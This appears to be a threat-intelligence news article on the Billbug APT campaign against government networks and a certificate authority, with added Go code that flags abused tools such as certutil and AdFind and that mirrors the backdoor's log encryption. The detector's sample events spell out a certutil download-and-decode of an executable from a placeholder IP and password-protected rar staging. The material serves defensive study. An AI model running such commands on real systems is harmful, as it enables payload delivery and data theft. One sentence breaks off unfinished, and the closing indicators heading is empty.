An ongoing campaign has been attributed to the APT group Billbug, also known as Lotus Blossom and Thrip. The group has been active since at least 2009, and in its 2018 and 2019 activity it was observed deploying the backdoors Hannotog and Sagerunex.
The same backdoors have been found in the recent campaign, which targets government networks and a certificate authority (CA). Researchers believe that the attackers compromised a large number of victims through this campaign.
A successful compromise of a certificate authority is particularly dangerous: if the attackers can issue certificates that chain to a trusted root, they can sign malware so that it passes as legitimately signed software and evades detection, and they can mint server certificates that let them intercept HTTPS traffic.
Malware Attack Infection Chain
During the investigation of the campaign, researchers found that the attackers made extensive use of both dual-use and living-off-the-land tools.
Also, some of the indications say that APT hackers
Several publicly available tools were used in this attack, including the following:
- AdFind – A publicly available command-line tool used to query Active Directory.
- Winmail – Can open winmail.dat files.
- WinRAR – An archive manager that can be used to archive or compress files, for example to stage data prior to exfiltration.
- Ping – A built-in network utility that determines whether a specific host on a network is responding.
- Tracert – A built-in network utility that shows the "path" packets take from one IP address to another.
- Route – A built-in Windows command that displays or modifies the local IP routing table, i.e. the paths used to send packets to addresses on other networks.
- NBTscan – An open-source command-line NetBIOS scanner.
- Certutil – A Microsoft Windows utility that can be abused for various malicious purposes, such as decoding (Base64) data, downloading files, and installing root certificates into the certificate store.
- Port Scanner – Lets an attacker determine which ports on a host are open and could potentially be used to send and receive data.
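Most of the tools above are legitimate administrative utilities, so detection has to key on how they are invoked rather than on their presence. As an added example (not from the article or from Symantec's report), the following Go program classifies constructed process-creation events against the tool list above. The command-line patterns, image paths and sample IP address are assumptions drawn from common abuse of these utilities, not indicators published for this campaign.

```go
package main

import (
	"fmt"
	"strings"
)

// ProcessEvent is the minimal subset of a process-creation record (Sysmon
// Event ID 1 or Windows Security 4688) that the rules below need.
type ProcessEvent struct {
	Image       string
	CommandLine string
}

// lolbinRule pairs an executable name with a predicate over its lower-cased
// command line. ASSUMPTION: the predicates reflect common abuse of these
// tools, not command lines published for this campaign.
type lolbinRule struct {
	reason string
	match  func(cmd string) bool
}

func hasAny(cmd string, needles ...string) bool {
	for _, n := range needles {
		if strings.Contains(cmd, n) {
			return true
		}
	}
	return false
}

var lolbinRules = map[string]lolbinRule{
	// Certutil is legitimate for certificate administration; download,
	// decode and root-store changes are the abuse cases the article lists.
	"certutil.exe": {"certutil used to download, decode or install a root cert", func(c string) bool {
		return hasAny(c, "-urlcache", "-decode", "-addstore")
	}},
	// Dual-use enumeration tools: any execution on a server is worth triage.
	"adfind.exe":  {"AdFind Active Directory enumeration", func(string) bool { return true }},
	"nbtscan.exe": {"NBTscan NetBIOS sweep", func(string) bool { return true }},
	// WinRAR building a password-protected archive (-hp/-p) ahead of exfiltration.
	"rar.exe":    {"WinRAR staging a password-protected archive", func(c string) bool { return hasAny(c, " -hp", " -p") }},
	"winrar.exe": {"WinRAR staging a password-protected archive", func(c string) bool { return hasAny(c, " -hp", " -p") }},
}

// baseName extracts the lower-cased file name from a Windows or POSIX path.
func baseName(image string) string {
	s := strings.ReplaceAll(image, "\\", "/")
	return strings.ToLower(s[strings.LastIndex(s, "/")+1:])
}

// Classify returns the triage reason and true when an event matches a rule,
// or "" and false otherwise.
func Classify(ev ProcessEvent) (string, bool) {
	r, ok := lolbinRules[baseName(ev.Image)]
	if !ok || !r.match(strings.ToLower(ev.CommandLine)) {
		return "", false
	}
	return r.reason, true
}

func main() {
	// Constructed sample events; the IP is from a documentation range.
	events := []ProcessEvent{
		{`C:\Windows\System32\certutil.exe`, `certutil.exe -urlcache -split -f http://198.51.100.7/update.txt C:\Users\Public\u.txt`},
		{`C:\Windows\System32\certutil.exe`, `certutil.exe -decode C:\Users\Public\u.txt C:\Users\Public\u.exe`},
		{`C:\Windows\System32\certutil.exe`, `certutil.exe -verify C:\certs\server.cer`},
		{`C:\Users\Public\AdFind.exe`, `AdFind.exe -f objectcategory=computer`},
		{`C:\Program Files\WinRAR\rar.exe`, `rar.exe a -hpSecret C:\Users\Public\out.rar C:\Finance`},
		{`C:\Windows\notepad.exe`, `notepad.exe readme.txt`},
	}
	for _, ev := range events {
		if reason, hit := Classify(ev); hit {
			fmt.Printf("ALERT %-60s %s\n", ev.CommandLine, reason)
		}
	}
}
```

Rules like these are a starting point for hunting, not a verdict: certutil -verify is benign in the sample, while the download and decode invocations fire, and a real deployment would add parent-process and user context before alerting.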
Another notable activity of this APT group is its use of Stowaway, a penetration-testing tool written in Go that provides multi-hop proxying and is popular in the penetration-testing community. This is not unusual, as threat actors frequently repurpose penetration-testing tools for their attacks.
Technical analysis indicates that the Sagerunex backdoor is dropped by a loader malware and that it communicates with a command-and-control (C&C) server.
Researchers from Symantec analyzed the sample and found that the backdoor keeps encrypted logs: the encryption is AES-256-CBC with a key derived through 8192 rounds of SHA-256, and the same scheme is used for its network communication.
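The scheme as described, AES-256-CBC with a key obtained from 8192 rounds of SHA-256, is shown below as an added Go example; it is illustrative code, not Sagerunex's own routine or Symantec's analysis tooling. The page does not publish how the backdoor derives the key beyond the round count, how it carries the IV, or what padding it uses, so the chained-digest derivation, the random IV prepended to the ciphertext, PKCS#7 padding and the sample secret are all assumptions.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
	"io"
)

// KDFRounds matches the "8192 rounds of SHA256" the analysis reports.
const KDFRounds = 8192

// DeriveKey feeds the secret through KDFRounds chained SHA-256 invocations
// and returns the resulting 32-byte AES-256 key.
// ASSUMPTION: the page does not say what is hashed each round (salt, counter,
// previous digest); plain digest chaining is used for illustration.
func DeriveKey(secret []byte) []byte {
	sum := sha256.Sum256(secret)
	for i := 1; i < KDFRounds; i++ {
		sum = sha256.Sum256(sum[:])
	}
	return sum[:]
}

// pkcs7Pad pads to a whole number of AES blocks (ASSUMPTION: PKCS#7 padding).
func pkcs7Pad(b []byte) []byte {
	n := aes.BlockSize - len(b)%aes.BlockSize
	return append(append([]byte{}, b...), bytes.Repeat([]byte{byte(n)}, n)...)
}

// pkcs7Unpad strips PKCS#7 padding, rejecting malformed trailers.
func pkcs7Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 || len(b)%aes.BlockSize != 0 {
		return nil, errors.New("data is not block aligned")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize {
		return nil, errors.New("invalid padding byte")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("invalid padding")
		}
	}
	return b[:len(b)-n], nil
}

// EncryptLog returns iv || AES-256-CBC(pad(plaintext)) under the derived key.
// ASSUMPTION: a random IV prepended to the ciphertext; the page does not
// describe how the backdoor transports its IV.
func EncryptLog(secret, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(DeriveKey(secret))
	if err != nil {
		return nil, err
	}
	iv := make([]byte, aes.BlockSize)
	if _, err := io.ReadFull(rand.Reader, iv); err != nil {
		return nil, err
	}
	padded := pkcs7Pad(plaintext)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return append(iv, ct...), nil
}

// DecryptLog reverses EncryptLog. A wrong secret yields either garbage or a
// padding error, which is what an analyst sees when guessing the secret.
func DecryptLog(secret, data []byte) ([]byte, error) {
	if len(data) < 2*aes.BlockSize || len(data)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext too short or not block aligned")
	}
	block, err := aes.NewCipher(DeriveKey(secret))
	if err != nil {
		return nil, err
	}
	iv, ct := data[:aes.BlockSize], data[aes.BlockSize:]
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	return pkcs7Unpad(pt)
}

func main() {
	secret := []byte("constructed-sample-secret") // constructed; not recovered from any sample
	line := []byte("constructed log entry: beacon to c2 at 12:00")
	blob, err := EncryptLog(secret, line)
	if err != nil {
		panic(err)
	}
	back, err := DecryptLog(secret, blob)
	if err != nil {
		panic(err)
	}
	fmt.Printf("key prefix=%x\nblob=%x\nplaintext=%q\n", DeriveKey(secret)[:8], blob, back)
}
```

For an analyst the practical point is that once the secret is recovered from the sample (a hard-coded string, or a value reconstructed from the binary), the same derivation decrypts both the on-disk logs and captured C&C traffic; the 8192 hash rounds mainly slow down brute-forcing a weak secret and cost the backdoor itself nothing noticeable.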
“The main motivation of this campaign is believed to be stealing data from targets such as the CA and government victims. The targeting of the government victims is most likely driven by espionage motivations, with the certificate authority likely targeted in order to steal legitimate digital certificates,” Symantec said in a blog post shared with Cyber Security News.
The attackers' ability to compromise multiple targets at once suggests that a well-resourced group of highly skilled actors is involved.
Indicators of Compromise